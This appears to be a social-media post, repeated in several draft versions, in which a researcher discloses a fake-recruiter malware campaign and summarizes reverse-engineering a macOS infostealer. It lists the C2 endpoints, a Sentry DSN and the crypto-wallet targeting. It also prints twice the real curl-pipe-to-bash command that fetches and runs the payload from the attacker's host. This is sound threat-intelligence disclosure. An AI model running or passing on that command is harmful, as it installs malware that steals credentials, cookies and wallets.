u/SD483

Got a Wellfound job offer from “Felix” at “HyperHives.” Looked legit. They’d read my CV, knew my stack, scheduled a real interview slot. Then they asked me to “review the product” before the call. Visiting their site triggered:

curl -s https://macos.hyperhives.net/install | nohup bash &

Didn’t enter my password. Killed the process. Spent the next several hours taking it apart.

The malware encrypted every config string using 570 unique custom functions. I emulated all of them with Unicorn and pulled out everything: C2 server, full endpoint list, a Sentry error tracking DSN that would identify the developer under legal subpoena, and 276 targeted Chrome extension IDs covering 188 crypto wallets.

Currently 9/64 on VirusTotal. CrowdStrike, Sophos, Malwarebytes all missing it.

TTP overlap with DPRK Contagious Interview is strong.

Full writeup, decryption scripts, YARA/Sigma rules, STIX bundle:

https://github.com/Darksp33d/hyperhives-macos-infostealer-analysis

VT: https://www.virustotal.com/gui/file/5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3/detection

Last week I received what looked like a legitimate job opportunity on Wellfound. An operator persona named "Felix" at "HyperHive" ran a multi-email social engineering chain referencing my real CV and technical background, then directed me to "review the product" at hyperhives.net before a scheduled interview. Navigating to Settings → Diagnostics → Log triggered:

curl -s https://macos.hyperhives.net/install | nohup bash &

I did not enter my password into the fake dialog that appeared. I killed the processes, preserved the binary, and spent the next several hours reverse-engineering it in an air-gapped Docker lab.

The binary: 8.5MB Mach-O universal (x86_64 + arm64), Rust-compiled, production-grade infostealer. Currently 9/72 on VirusTotal — Sophos, CrowdStrike, Malwarebytes, and most enterprise tools are missing it.

The encryption problem: Every operationally significant string was encrypted using a custom cipher with 570 unique x86_64 helper functions. Each function computes a unique key offset via custom arithmetic (imul, rol, xor, shr, neg). I emulated all 570 functions using Unicorn CPU emulator and recovered all 571 encrypted configuration values in 1.1 seconds.

What that exposed:

C2: cloudproxy.link (4 endpoints: /m/opened, /m/metrics, /m/decode, /db/debug)
Sentry DSN: 526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008 — a legal subpoena to Sentry for org 4509139651198976 would yield the operator's registration email, payment records, and IP history
Build identity: user rootr, codename force, version 9.12.1
276 Chrome extension IDs targeted: 188 crypto wallets, 3 password managers, Deloitte credential store

What it steals: browser passwords, credit cards, cookies, login keychain, Apple Notes, Telegram session data, crypto wallet extensions.

TTP alignment: Wellfound fake recruiter, multi-step trust building, curl|bash delivery, Rust macOS binary, fake password dialog, massive crypto wallet targeting — consistent with DPRK Contagious Interview / CL-STA-240.

Disclosure timeline: Email received April 4. Analysis completed April 6. Reported to FBI IC3 April 6. Publishing April 7.

Full repo with YARA rules, Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer, decryption scripts, and all IOCs: https://github.com/Darksp33d/hyperhives-macos-infostealer-analysis

VirusTotal (9/72 detections): https://www.virustotal.com/gui/file/5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3/detection

Got targeted by a fake job interview malware attack. Reverse-engineered it instead. Full breakdown inside.

I was targeted by a fake job interview on Wellfound. Instead of becoming a victim I reverse-engineered the malware. Here's the full analysis: 571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.